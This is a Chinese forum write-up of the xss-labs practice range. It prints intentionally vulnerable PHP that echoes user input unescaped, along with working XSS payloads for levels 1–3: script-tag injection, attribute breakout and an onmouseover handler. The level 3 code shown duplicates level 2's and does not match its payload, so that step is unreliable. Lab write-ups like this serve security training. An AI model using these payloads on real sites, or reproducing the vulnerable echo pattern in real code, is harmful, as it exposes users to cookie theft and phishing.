XSS靶场攻关笔记:从入门到精通XSS漏洞的利用

XSS(跨站脚本攻击)是一种在 Web 前端发生的漏洞,对前端用户构成危害。攻击者可以利用 XSS 漏洞进行钓鱼攻击、前端 JavaScript 挖矿、盗取用户 Cookie,甚至对主机进行远程控制。

安装

项目地址:https://gitee.com/Zcodetea/xss-labs

Level 1

图片[1]-XSS靶场攻关笔记:从入门到精通XSS漏洞的利用-山海云端论坛
<code><?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?></code>

通过 GET 方法传递参数,并直接输出到页面,构造 payload:

<code>http://192.168.123.240/level1.php?name=%3Cscript%3Ealert('bbskali.cn')%3C/script%3E</code>
图片[2]-XSS靶场攻关笔记:从入门到精通XSS漏洞的利用-山海云端论坛

Level 2

图片[3]-XSS靶场攻关笔记:从入门到精通XSS漏洞的利用-山海云端论坛
<code><?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level2.php method=GET> <input name=keyword value="'.$str.'"> <input type=submit name=submit value="搜索"/> </form> </center>'; ?></code>

修改 payload:

<code>"><script>alert()</script></code>

Level 3

图片[4]-XSS靶场攻关笔记:从入门到精通XSS漏洞的利用-山海云端论坛
<code><?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level2.php method=GET> <input name=keyword value="'.$str.'"> <input type=submit name=submit value="搜索"/> </form> </center>'; ?></code>

构造 payload:

<code>' onmouseover='javascript:alert(1)</code>

Level 4 – 11

图片[5]-XSS靶场攻关笔记:从入门到精通XSS漏洞的利用-山海云端论坛

依次分析代码,构造对应的 payload 进行攻击。

总结

XSS 靶场攻关笔记记录了针对不同关卡的 payload 构造和攻击方法,通过对代码的分析和理解,不断提高对 XSS 漏洞的认识和利用技巧。

© 版权声明
THE END
喜欢就支持一下吧
点赞10 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容